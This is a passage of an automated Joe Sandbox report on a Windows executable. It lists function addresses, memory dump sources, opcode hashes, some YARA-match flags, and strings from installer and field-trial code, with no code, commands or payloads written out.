                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c4f055ac782b3664726c85beb480bb1b478b35ddc245f1e4dec8f5d954b597f2
                                                                                                                        • Instruction ID: 1da01eb176508d2417b77582d0991b329ac21aa093f847f914381fa621373831
                                                                                                                        • Opcode Fuzzy Hash: c4f055ac782b3664726c85beb480bb1b478b35ddc245f1e4dec8f5d954b597f2
                                                                                                                        • Instruction Fuzzy Hash: B39139B4900B0A9FCB15DF29C88486AF7B5FF8A310714C75FE859AB705E730A991CB90
                                                                                                                        Function 008781D0 Relevance: .2, Instructions: 213COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2f6b083be8cd0dec4ae51d23245692e474ab65840e7064f93ec13dcc141b994f
                                                                                                                        • Instruction ID: 8fe26f3a12435922a89285650c87ddecbc37c432214c3fed2be3ad717a601389
                                                                                                                        • Opcode Fuzzy Hash: 2f6b083be8cd0dec4ae51d23245692e474ab65840e7064f93ec13dcc141b994f
                                                                                                                        • Instruction Fuzzy Hash: AC81261521822685C32C4F7D8599530F7A9FF58305B14DA3BEC8DCBBE6EB29C884D3A5
                                                                                                                        Function 0086E6C0 Relevance: .2, Instructions: 172COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 54a9bf14495292a2a205913a51f6b7a979cf36f7bbdc8d03a6b2fd658b64e061
                                                                                                                        • Instruction ID: 171118cf6987b8d9bac661e74c005f4c9b7e80f0f542347fd708a3736e28bead
                                                                                                                        • Opcode Fuzzy Hash: 54a9bf14495292a2a205913a51f6b7a979cf36f7bbdc8d03a6b2fd658b64e061
                                                                                                                        • Instruction Fuzzy Hash: E551B475E011298FDF04CE65C8807AEBBE2FF85341F168169C955EB281D2359D428BD0
                                                                                                                        Function 05968274 Relevance: .2, Instructions: 156COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7ac47f8c4578cc1fac529b785b8db90ae03f41c9aee6b53b5381fffee8f44611
                                                                                                                        • Instruction ID: 77d9b8b35aa7803847e7ac32abea9dc6c83e71b43ca11e8856264e239f285fbd
                                                                                                                        • Opcode Fuzzy Hash: 7ac47f8c4578cc1fac529b785b8db90ae03f41c9aee6b53b5381fffee8f44611
                                                                                                                        • Instruction Fuzzy Hash: 4B516272E00219EFDF14CF99C840AEEBBF6FF88304F498459E915AB201D774AA55DB90
                                                                                                                        Function 0090A224 Relevance: .2, Instructions: 156COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3a6f2e837451545aabe346b11b149648bb061824ca4cb33358dc881b498617d4
                                                                                                                        • Instruction ID: 00999816bb4797dafb1367a2b3322d431ecec21a262aa5ae77bf758a1c777720
                                                                                                                        • Opcode Fuzzy Hash: 3a6f2e837451545aabe346b11b149648bb061824ca4cb33358dc881b498617d4
                                                                                                                        • Instruction Fuzzy Hash: DF518F72D00219EFDF14CF99C840AEEBBB6FF88300F498469E915AB241D7759E40DB91
                                                                                                                        Function 008D05F0 Relevance: .1, Instructions: 135COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1a0fd7a5873ef41d60fd70c029d79829f517796bc12a9caff67bcfd187504ae0
                                                                                                                        • Instruction ID: 96cacf2e2564bba0ce6df5cd8383eaee05fb53a212009317819212f3b6c7846b
                                                                                                                        • Opcode Fuzzy Hash: 1a0fd7a5873ef41d60fd70c029d79829f517796bc12a9caff67bcfd187504ae0
                                                                                                                        • Instruction Fuzzy Hash: 19510C65D38FCA46E3136B3DA403226E714AEFB598E20E71BFDE438C55FB5192826148
                                                                                                                        Function 00850C40 Relevance: .1, Instructions: 132COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6febac9748b7a697b4a04af9e9792c2773b60e2a89f072b7284a025d9984854a
                                                                                                                        • Instruction ID: e63f8f0858ea334a1c5db672cdb9fa560d01ba7393863df50f543971367009f0
                                                                                                                        • Opcode Fuzzy Hash: 6febac9748b7a697b4a04af9e9792c2773b60e2a89f072b7284a025d9984854a
                                                                                                                        • Instruction Fuzzy Hash: 9051B171814B059FC703EF38C99196AF7AAFF96744F04C719F44BA6112EB30A895CB52
                                                                                                                        Function 008F0440 Relevance: .1, Instructions: 115COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 969184d1714d08fbda68cb3d0ed13970b435337c183ddf4ea4504258b8a4104f
                                                                                                                        • Instruction ID: 9ccc1d9717289ed49392b539ee82d2fbf28c6a0851b717701c7fc75283c5d483
                                                                                                                        • Opcode Fuzzy Hash: 969184d1714d08fbda68cb3d0ed13970b435337c183ddf4ea4504258b8a4104f
                                                                                                                        • Instruction Fuzzy Hash: FC4155F5C10F448AD722EF3199016E3F6A2BFA6304F15972EF69A50522F72171D09B42
                                                                                                                        Function 059410AB Relevance: .1, Instructions: 107COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
                                                                                                                        • Instruction ID: 2adfe65b7998cd0aa3fe5e5a561c7aebc92b100b36c62e4124231faab7179389
                                                                                                                        • Opcode Fuzzy Hash: b09967ac5482500bc099009dc95111bd7cc7545dcabcf40ba633cd1a509d9f95
                                                                                                                        • Instruction Fuzzy Hash: 15514F74E01209DFCB08CF98C590AAEB7B2FF88314F248599D815AB355D731AE91DFA4
                                                                                                                        Function 008F8B00 Relevance: .1, Instructions: 93COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d84aabd448818e380069a89193d96ee25f13ea4cc77288f3363bc9b1ada2d506
                                                                                                                        • Instruction ID: e13d8649fc046039230024415db6aa793aaad969f1ace12004b88a07562acdb2
                                                                                                                        • Opcode Fuzzy Hash: d84aabd448818e380069a89193d96ee25f13ea4cc77288f3363bc9b1ada2d506
                                                                                                                        • Instruction Fuzzy Hash: 3B41D1DAC2DF8D06E703173DA8831A2B310AEB35A8621EB47FDF4756A1FB12A1557314
                                                                                                                        Function 059625B4 Relevance: .1, Instructions: 76COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                        • Instruction ID: c7f8b3203a51d136be6706d9fdeff35b05fe9c2a4619f3c9cd1f4b8fab2741b9
                                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                        • Instruction Fuzzy Hash: 7111E27F209142439E14CB2DD9B82BAA78BFAC522072D827BD4828B65CD622A15DA704
                                                                                                                        Function 059410AA Relevance: .1, Instructions: 66COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                                                        • Instruction ID: 533460bed2e962cbd4c099685bcb0e8689eb2443ae3bd1fccc11e8ef03447743
                                                                                                                        • Opcode Fuzzy Hash: 4e64317625e06953a0030493f718403388be9115d8c6a0e5777c3d8d6dbedd3d
                                                                                                                        • Instruction Fuzzy Hash: E23162B4E00119DFCB08CF98C590AAEBBB2FF48314F248599D815AB345D735AE85DF94
                                                                                                                        Function 05942D68 Relevance: .0, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fa14c465a1d6a95a6bfa9dd17c304615794b29be19efbb8f6307b423f3602397
                                                                                                                        • Instruction ID: 5cbea287e393ef80ed51b52e0dd865d82bc30c7b44284be40d6cb3ca6478aaa0
                                                                                                                        • Opcode Fuzzy Hash: fa14c465a1d6a95a6bfa9dd17c304615794b29be19efbb8f6307b423f3602397
                                                                                                                        • Instruction Fuzzy Hash: 03018B76D240710AA70C4B3FAC11837BB95BB5711234702BBF987EB0D1C819D565DBE8
                                                                                                                        Function 05955164 Relevance: .0, Instructions: 37COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b1ad7b8e6dd2d3a30a1b537087b143b080f705283c280b151f3205acabd5c428
                                                                                                                        • Instruction ID: 739ad0dbfd42d48adb8f749f65e25892f343416a825afcc572a0a85782672d4c
                                                                                                                        • Opcode Fuzzy Hash: b1ad7b8e6dd2d3a30a1b537087b143b080f705283c280b151f3205acabd5c428
                                                                                                                        • Instruction Fuzzy Hash: 74F036725010296F9F09EF64C816CFF7796EF58250B05811DFC1657140C635EC61E7D4
                                                                                                                        Function 05940E0B Relevance: .0, Instructions: 33COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                        • Instruction ID: 24264871a32431c6e684ffb2aa687233976c0b829d3b61803f1d6f053ff5e55a
                                                                                                                        • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                                                                                                                        • Instruction Fuzzy Hash: 4001B634A01108EFCB14DF98C198EAEB7B6FB44310F64C699D9059B390C734AE92EF80
                                                                                                                        Function 00824577 Relevance: .0, Instructions: 19COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b478e1f546ce9a5c90263f502841de5ed2815c13aa0d6343b5217c81eca3c23b
                                                                                                                        • Instruction ID: b3aec4985b90900688e4cb9825199d5f311b3cb2f5d24abb7116ebe1e6d53e70
                                                                                                                        • Opcode Fuzzy Hash: b478e1f546ce9a5c90263f502841de5ed2815c13aa0d6343b5217c81eca3c23b
                                                                                                                        • Instruction Fuzzy Hash: 3FE0EC305183418FC746DF20C190866FBB1EF87311B06E689D4999B566D334EE88CB65
                                                                                                                        Function 008BAF90 Relevance: 39.0, APIs: 6, Strings: 16, Instructions: 474COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • check-the-interface, xrefs: 008BB18A, 008BB1D1, 008BB1D8, 008BB1E9
                                                                                                                        • , installer crashed, xrefs: 008BB5F3
                                                                                                                        • Failed to check Win10 internal interface availability: , xrefs: 008BB003, 008BB39E
                                                                                                                        • Failed to check Win10 internal interface availability, , xrefs: 008BB468
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008BB631
                                                                                                                        • can't get installer exe path., xrefs: 008BB014
                                                                                                                        • IsInternalInterfaceAvailableSafeCheck, xrefs: 008BAFED, 008BB2EC, 008BB385, 008BB452, 008BB4D7, 008BB575
                                                                                                                        • Successfuly checked Win10 internal interface availability: , xrefs: 008BB4EB
                                                                                                                        • availability: , xrefs: 008BB4FD
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008BB62A
                                                                                                                        • installer was terminated by timeout., xrefs: 008BB479
                                                                                                                        • can't run installer: , xrefs: 008BB3AF
                                                                                                                        • Failed to check Win10 internal interface availability, unknown ret code: , xrefs: 008BB302
                                                                                                                        • ret code: , xrefs: 008BB59C
                                                                                                                        • Failed to check Win10 internal interface availability,, xrefs: 008BB58B
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008BB623
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: installer was terminated by timeout.$ ret code: $, installer crashed$..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$Failed to check Win10 internal interface availability,$Failed to check Win10 internal interface availability, $Failed to check Win10 internal interface availability, unknown ret code: $Failed to check Win10 internal interface availability: $IsInternalInterfaceAvailableSafeCheck$Successfuly checked Win10 internal interface availability: $availability: $can't get installer exe path.$can't run installer: $check-the-interface
                                                                                                                        • API String ID: 4218353326-1762643915
                                                                                                                        • Opcode ID: 566cadb3121b8ca69276fa178d41ec8b7ed44a20733b57a63886a7173aadc2e2
                                                                                                                        • Instruction ID: 3662c44369442a2dc4678595f4149a2357a7dc8bcfca407a9a366c2385cc76c8
                                                                                                                        • Opcode Fuzzy Hash: 566cadb3121b8ca69276fa178d41ec8b7ed44a20733b57a63886a7173aadc2e2
                                                                                                                        • Instruction Fuzzy Hash: CC02F4716007019ED720EF75CC82BAAB7A5FF94704F04492CF59AC6293EBB0B549CB92
                                                                                                                        Function 008AE210 Relevance: 38.8, APIs: 7, Strings: 15, Instructions: 313COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 008B65E0: TryAcquireSRWLockExclusive.KERNEL32(00966B40,?,?,00962570,009305AE,?,?,008AEA0C,00962570,?,?,?,?,?,?,-00000001), ref: 008B66D7
                                                                                                                          • Part of subcall function 008B65E0: ReleaseSRWLockExclusive.KERNEL32(00966B40,?,?,00962570,009305AE,?,?,008AEA0C,00962570,?,?,?,?,?,?,-00000001), ref: 008B6700
                                                                                                                        • _strlen.LIBCMT ref: 008AE285
                                                                                                                        • _strlen.LIBCMT ref: 008AE488
                                                                                                                        • _strlen.LIBCMT ref: 008AE4AE
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008AE5AB
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008AE5EB
                                                                                                                          • Part of subcall function 008FFBA7: EnterCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBB2
                                                                                                                          • Part of subcall function 008FFBA7: LeaveCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBEF
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008AE62B
                                                                                                                        • __Init_thread_header.LIBCMT ref: 008AE66B
                                                                                                                        Strings
                                                                                                                        • under feature , xrefs: 008AE472
                                                                                                                        • field_trial_params.cc, xrefs: 008AE40C, 008AE50A
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008AE590
                                                                                                                        • FieldTrialParams-param_name, xrefs: 008AE602
                                                                                                                        • Failed to parse field trial param , xrefs: 008AE41C
                                                                                                                        • FieldTrialParams-feature_name, xrefs: 008AE5C2
                                                                                                                        • with string value , xrefs: 008AE44A
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008AE589
                                                                                                                        • into , xrefs: 008AE49D
